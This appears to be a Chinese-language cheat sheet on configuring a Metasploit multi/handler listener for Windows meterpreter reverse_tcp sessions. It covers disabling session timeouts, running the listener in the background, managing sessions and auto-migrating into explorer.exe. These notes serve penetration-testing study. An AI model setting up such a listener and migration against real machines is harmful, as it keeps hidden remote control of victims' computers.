监听参数
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
set ExitOnSession false
set SessionCommunicationTimeout 0
set SessionExpirationTimeout 0
set stagerverifysslcert false
exploit -j -z
实际操作发现set SessionCommunicationTimeout
设置为0会导致session死亡,原因暂不明确
详解:
set ExitOnSession false
//可以让建立监听的端口继续保持侦听,可以接受多个session
set SessionCommunicationTimeout 0
//默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0
set SessionExpirationTimeout 0
//默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭
set stagerverifysslcert false
//防止获取shell的时候出现的SSL_accept错误
exploit -j -z
//使用exploit -j -z可在后台持续监听,-j为后台任务,-z为持续监听
管理会话
session
//查看当前所有会话
session 1
//进入编号为1的会话
bg
//把当前会话放入后台
quit
//断开当前会话
自动化
set AutoRunScript migrate -n explorer.exe
//将当前进程移植到explorer.exe进程
set AutoRunScript multiscript -rc /root/my_script/script.rc
//会话建立自动执行script.rc里的命令
详解:
参考
Meterpreter:https://www.cnblogs.com/ssooking/p/6192995.html
MSF命令大全详解:https://www.cnblogs.com/MyGuazi/p/11871420.html
渗透之——在Metasploit中使用AutoRunScript:https://blog.csdn.net/l1028386804/article/details/86669614